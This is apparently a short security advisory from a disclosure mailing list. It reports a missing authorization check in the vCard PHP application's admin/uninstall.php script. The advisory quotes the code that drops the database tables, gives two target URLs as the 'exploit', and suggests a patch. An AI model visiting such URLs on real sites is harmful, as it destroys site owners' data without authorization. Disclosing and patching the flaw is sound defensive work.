<<< Date Index >>>     <<< Thread Index >>>

Vcard 2.8 uninstall script problem




Informations :
°°°°°°°°°°°°°°
Procduct: Vcard
Version : 2.9 may other VER
Problems : File uninstall & delete the table

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/admin/uninstall.php :
------------------------------------------------------------------------
[...]

<?
$step = $HTTP_GET_VARS['step'];
if (empty($step))
{
    echo "<p><b>Are you sure, uninstall vCard database tables and them 
contents?</b></p>";
    echo "<p>Yes, I'm sure. <a href='$PHP_SELF?step=2'>Click here to continue 
--></a></p>";
}

if ($step == 2)
{
        include "./config.inc.php";
        include("./db_mysql.inc.php");
        include("./functions.inc.php");

        $DB_site = new DB_Sql_vc;
        $DB_site->server = $hostname;
        $DB_site->user = $dbUser;
        $DB_site->password = $dbPass;
        $DB_site->database = $dbName;
        $DB_site->connect();
        $dbPass = "";
        $DB_site->password = "";

        //*********************************************
        $DB_site->query("DROP TABLE IF EXISTS vcard_abook ");
        $DB_site->query("DROP TABLE IF EXISTS vcard_account ");
?>

As u can see the script does not Check User Authorization 

Exploit:
°°°°°°°°°°
http://[target]/[Vcard folder]/admin/uninstall.php

or 

http://[target]/[Vcard folder]/admin/uninstall.php?step=2

patch:
°°°°°°°°°°
remove uninstall.php and protect admin folder by .htaccess



Saudi Linux 
KSA o0 KSA 0o